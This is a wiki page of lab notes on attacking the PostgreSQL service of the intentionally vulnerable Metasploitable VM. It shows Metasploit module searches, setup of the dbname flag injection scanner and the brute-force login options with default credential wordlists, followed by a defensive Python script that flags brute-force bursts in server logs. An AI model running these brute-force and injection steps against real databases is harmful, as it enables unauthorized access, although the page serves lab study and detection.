Metasploitable/Postgres: Difference between revisions
From charlesreid1
Revision as of 01:04, 25 March 2016
This page covers activities on the Metasploitable VirtualBox VM related to the PostgreSQL service it runs.
Search for Exploits
<pre>
msf auxiliary(postgres_version) > search postgresql

Matching Modules
================

   Name                                                       Disclosure Date  Rank       Description
   ----                                                       ---------------  ----       -----------
   auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal     ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal     Ruby on Rails Devise Authentication Password Reset
   auxiliary/admin/postgres/postgres_readfile                                  normal     PostgreSQL Server Generic Query
   auxiliary/admin/postgres/postgres_sql                                       normal     PostgreSQL Server Generic Query
   auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal     PostgreSQL Database Name Command Line Flag Injection
   auxiliary/scanner/postgres/postgres_login                                   normal     PostgreSQL Login Utility
   auxiliary/scanner/postgres/postgres_version                                 normal     PostgreSQL Version Probe
   auxiliary/server/capture/postgresql                                         normal     Authentication Capture: PostgreSQL
   exploit/linux/postgres/postgres_payload                    2007-06-05       excellent  PostgreSQL for Linux Payload Execution
   exploit/multi/http/manage_engine_dc_pmp_sqli               2014-06-08       excellent  ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   exploit/windows/postgres/postgres_payload                  2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution
   post/linux/gather/enum_users_history                                        normal     Linux Gather User History
</pre>
Scanner
One of the first pieces of information you will need, even before running a brute-force attack on a PostgreSQL login, is a database name.
Start with an exploit to obtain a PostgreSQL database name:
Postgres dbname flag injection
Use the auxiliary/scanner/postgres/postgres_dbname_flag_injection module:
<pre>
msf > use auxiliary/scanner/postgres/postgres_dbname_flag_injection
msf auxiliary(postgres_dbname_flag_injection) > show options

Module options (auxiliary/scanner/postgres/postgres_dbname_flag_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    5432             yes       The target port
   THREADS  1                yes       The number of concurrent threads
</pre>
<pre>
msf auxiliary(postgres_dbname_flag_injection) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(postgres_dbname_flag_injection) > set RPORT 5432
RPORT => 5432
</pre>
Postgres Login
Like with MySQL, the Metasploit framework implements a brute-force login tool for PostgreSQL.
<pre>
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                                Required  Description
   ----              ---------------                                                                --------  -----------
   BLANK_PASSWORDS   false                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                              yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                      yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                          no        Add all users in the current database to the list
   PASSWORD                                                                                         no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt       no        File containing passwords, one per line
   Proxies                                                                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                           no        Set to true to see query result sets
   RHOSTS                                                                                           yes       The target address range or CIDR identifier
   RPORT             5432                                                                           yes       The target port
   STOP_ON_SUCCESS   false                                                                          yes       Stop guessing when a credential works for a host
   THREADS           1                                                                              yes       The number of concurrent threads
   USERNAME          postgres                                                                       no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt   no        File containing (space-seperated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                          no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt       no        File containing users, one per line
   VERBOSE           true                                                                           yes       Whether to print output for all attempts

msf auxiliary(postgres_login) >
</pre>
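The flip side of the login scanner above is what it leaves in the PostgreSQL server log: each guess from the wordlists becomes a FATAL "password authentication failed" line for the chosen DATABASE (template1 here), and a correct guess is followed by a "connection authorized" line from the same client. The script below is an added example, not part of this page or of Metasploit, that parses such log lines and flags a client that produces a burst of failures, optionally followed by a success. It assumes PostgreSQL's stderr logging with a log_line_prefix of '%t [%p] %u@%d %r ' (an assumption; adjust the regex to your prefix), and the sample log lines embedded in it are constructed, not captured from a real host.

```python
"""Flag PostgreSQL login brute-forcing from server log lines.

Added example for this wiki page; not code from the page or from Metasploit.
Assumes log_line_prefix = '%t [%p] %u@%d %r ' (an assumption).  The sample
log text below is constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (timestamp, pid, user@database, client(port), level, message)
SAMPLE_LOG = """\
2016-03-25 01:00:01 UTC [2201] postgres@template1 10.0.0.5(40110) FATAL:  password authentication failed for user "postgres"
2016-03-25 01:00:01 UTC [2202] admin@template1 10.0.0.5(40111) FATAL:  password authentication failed for user "admin"
2016-03-25 01:00:02 UTC [2203] postgres@template1 10.0.0.5(40112) FATAL:  password authentication failed for user "postgres"
2016-03-25 01:00:02 UTC [2204] scott@template1 10.0.0.5(40113) FATAL:  password authentication failed for user "scott"
2016-03-25 01:00:03 UTC [2205] postgres@template1 10.0.0.5(40114) FATAL:  password authentication failed for user "postgres"
2016-03-25 01:00:03 UTC [2206] postgres@template1 10.0.0.5(40115) LOG:  connection authorized: user=postgres database=template1
2016-03-25 01:05:00 UTC [2300] appuser@appdb 10.0.0.9(51000) FATAL:  password authentication failed for user "appuser"
"""

# Matches one line in the assumed prefix format.
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \S+ \[\d+\] '
    r'(?P<user>[^@\s]+)@(?P<db>\S+) (?P<host>[\d.]+)\(\d+\) '
    r'(?P<level>FATAL|LOG):\s+(?P<msg>.*)$'
)


def parse_line(line):
    """Return a dict for a recognised log line, or None for anything else."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ev = m.groupdict()
    ev['ts'] = datetime.strptime(ev['ts'], '%Y-%m-%d %H:%M:%S')
    return ev


def detect_bruteforce(log_text, window_seconds=60, threshold=3):
    """Map client host -> summary for hosts with >= threshold auth failures
    inside any window_seconds-long window.  A success from the same host at
    or after its last failure is reported too, since that is the signature of
    a guessed credential."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev['level'] == 'FATAL' and 'password authentication failed' in ev['msg']:
            failures[ev['host']].append(ev)
        elif 'connection authorized' in ev['msg']:
            successes[ev['host']].append(ev)

    alerts = {}
    window = timedelta(seconds=window_seconds)
    for host, evs in failures.items():
        evs.sort(key=lambda e: e['ts'])
        # Sliding window: largest number of failures within `window`.
        start, best = 0, 0
        for end in range(len(evs)):
            while evs[end]['ts'] - evs[start]['ts'] > window:
                start += 1
            best = max(best, end - start + 1)
        if best < threshold:
            continue
        last_fail = evs[-1]['ts']
        success_after = any(s['ts'] >= last_fail for s in successes.get(host, []))
        alerts[host] = {
            'failures': len(evs),
            'max_in_window': best,
            'users': sorted({e['user'] for e in evs}),
            'databases': sorted({e['db'] for e in evs}),
            'success_after_failures': success_after,
        }
    return alerts


if __name__ == '__main__':
    for host, info in detect_bruteforce(SAMPLE_LOG).items():
        print(host, info)
```

On the constructed sample the single failure from 10.0.0.9 is ignored, while 10.0.0.5 is reported with five failures across three usernames against template1 and a success right after the last failure. The database column is worth keeping in the alert: a burst of guesses against template1 specifically points at a tool that was never told a real database name, which is exactly why the page recommends learning one first.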
Related